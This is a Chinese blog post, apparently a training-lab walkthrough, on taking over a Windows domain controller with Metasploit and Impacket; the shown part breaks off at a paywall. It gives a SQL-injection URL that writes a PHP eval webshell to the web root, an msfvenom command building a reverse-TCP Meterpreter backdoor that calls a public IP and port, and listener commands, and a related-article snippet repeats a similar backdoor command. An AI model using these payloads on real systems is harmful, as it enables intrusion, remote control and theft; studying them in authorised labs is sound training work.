【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控

最新推荐文章于 2024-09-30 08:05:35 发布
最新推荐文章于 2024-09-30 08:05:35 发布
阅读量1.5k 收藏 13
点赞数 2
分类专栏: 安全 网络 黑客 文章标签: web安全 安全 网络安全 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/120922360
版权
本文详细介绍了如何利用Metasploit Framework(MSF)和Impacket工具在内网环境中进行渗透测试,最终获取域控制器的权限。首先,通过SQL注入获取Webshell,然后使用MSF进行提权和内网穿透。接着,利用Kiwi模块抓取密码并进行hash传递尝试。最后,通过Impacket的smbexec.py模块,利用NTLM hash成功登陆域控,实现域控的接管。整个过程展示了从信息收集到权限提升的一系列步骤。
摘要由CSDN通过智能技术生成

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

查看资料

1、进去一看,典型的sql注入
在这里插入图片描述
2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

在这里插入图片描述
②蚁剑连接,发现权限很低
在这里插入图片描述

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么内网穿透,方法太多了)

kali内网穿透用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108
在这里插入图片描述
2、接着设置一下花生壳的配置在这里插入图片描述
3、可以看到我们映射到公网的ip和端口
在这里插入图片描述
4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

在这里插入图片描述
5、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp
或者使用
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 6666
run

在这里插入图片描述
6、执行webshell中的木马
在这里插入图片描述

sessions 1 //进入会话

7、发现无法不是最高权限,getsystem/getprivs并未成功
在这里插入图片描述
8、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令
在这里插入图片描述
②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local
最低0.47元/天 解锁文章
IT老涵
关注
专栏目录
Impacket网络协议工具包介绍
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-07 555
Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&域控系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞
HACKONE的博客
06-24 581
当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。set payload windows/x64/meterpreter/bind_tcp //正向连接上线。run post/multi/manage/autoroute //添加当前路由表。
获取域控的方法
2301_76786857的博客
01-19 1628
在域渗透中、作为渗透测试人员,获取域控的权限基本上可以获取整个内网的权限
在 Kali Linux 中安装 Impacket
最新发布
weixin_44023460的博客
09-30 543
在安装 Impacket 之前,你需要确保安装了 Python 和一些必要的依赖。通常,Kali 已经预装了 Python。步骤 3:克隆 Impacket 仓库。步骤 4:进入 Impacket 目录。如果你看到帮助信息,说明安装成功。步骤 5:安装 Impacket
内网渗透瑞士军刀-impacket工具解析(一)
失心少年
05-15 1423
impacket是一系列网络协议的python实现,实现包括IP、TCP、ICMP等基础的网络协议,更重要的是其实现了大量的Windows通信协议,包含Windows认证使用的ntlm和kerberos协议、用于活动目录数据存储的ldap及大量的msrpc协议。
内网渗透靶场(下)拿下域控 #zkaq
anlalu233的博客
09-17 2180
  内网往往有好多台服务器组成集群,为了方便管理,windwos系统可以通过域批量管理;管理员直接操作的服务器称为控制器,能操控域里面所有的节点,概念上类似于master;其余节点可通过master批量被操作,概念上类似于slave,俗称客户机;拿下控制节点,就等于拿下了整个域;   1、这里假设先拿下了一台客户机,远程桌面登陆,上传猕猴桃,先扫描内存,找到域下面的administrator账号,: Authentication Id : 0 ; 381160 (00000000:0005d0e8)
获取域控权限的方法
2301_76786857的博客
01-18 1233
对于入侵者来说,进入企业后,为了获取最大权限,通常会将目标瞄准在域控上。下面是针对不同的域控环境,列举的几种不同的攻击攻击手法。
内网渗透-Windows内网渗透
lza20001103的博客
08-15 2004
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
内网渗透-横向移动外部工具的使用
lza20001103的博客
10-01 2289
横向移动外部工具的使用 前言 文章目录横向移动外部工具的使用前言psexecSmbexecWmiexecmsf模块cs模块 psexec 首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话 在已获得的shell中输入 net use \192.168.52.141 /user:administrator “密码” (1)psexec https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec psexec使用 建立IPC连接,无需
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1501
内网环境下的横向移动总结
内网渗透瑞士军刀-impacket工具解析(五)
失心少年
05-20 1009
psexec利用DCERPC和命名管道巧妙地实现了Windows平台远程交互式shell,但是工具本身还是存在许多明显的特征。
如何通过代码审计从三层内网各种漏洞拿到域控
kali_Ma的博客
07-16 839
目录代码审计 GetshellBypass 突破执行命令拿到宝塔后台权限拿到第一个 root.txt内网渗透一内网横向移动-192.168.59.4内网渗透内网渗透-10.10.10.202CVE-2020-1472 拿到域控总结结尾 本次靶场要求: 四个 root.txt 分别在四台机子用户目录下 拿到三个及格 拿下四个满分 代码审计 Getshell 首先是一个站:cocat.cc 通过提示把它的备份文件下载到了本地进行审计: Bypass 突破执行命令 通过审计拿到了一个 webshell: .
攻防演练-实战 | 记一次对某企业的一次内网渗透总结
lza20001103的博客
08-28 1252
实战 | 记一次对某企业的一次内网渗透总结 文章目录实战 | 记一次对某企业的一次内网渗透总结0x01 外网打点到Getshell0x02 内网渗透0x03 横向渗透0x04 痕迹清理0x05 攻击结果0x06 总结 0x01 外网打点到Getshell 目标站点: 通过各种工具和在线网站,对子域名进行收集,并解析ip。发现主站存在CDN,使用fofa,搜索网站title、js等关键信息和子域名解析的ip对应的C段,发现真实ip。对真实ip的ip段进行扫描,发现一台机器存在Weblogic中间件,使用exp
Impacket工具使用
qq_18811919的博客
02-22 3788
Impacket工具包使用
拿下域控后,我还是对前辈的操作念念不忘
Askshhbs的博客
04-15 382
历来攻防演练中,我都笃信一个道理——吃饱了才有力气干活。所以,在清晨的客户现场,当看到大佬满意地吃完了我带来的煎饺,我知道这一战,我们作为攻击队,基本已经拿下了。 未来的黑客大佬!我们终于找到你了~ 想要获取更多免费学习资料可搜索公众号:“掌控安全课堂” 后台回复”我想学黑客“即可 虽然说的每一句话都带着一股醋味儿,但是大佬的含金量不容置疑——理智分析战况,果断找到目标,一切行云流水。 大佬告诉我们哪些站是好打的,哪些是不好打的。我们的任务是重点关注好打的站,找找OA、邮箱这些系统给他。随后,他顺手
横向移动工具-impacket-gui(一)
siu~
09-04 342
一款内网横向移动图形化工具
Impacket官方使用指南
weixin_30877755的博客
04-09 2885
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
渗透工具——kali中msf(后门生成模块msfvenom)
2301_78006725的博客
09-02 832
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
kali漏洞利用之Meterpreter介绍
The__Apollo的博客
04-22 3891
使用示例:1.生成Meterpreter后门命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe  这个语句中,如果不知道参数是什么,可以在metas
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值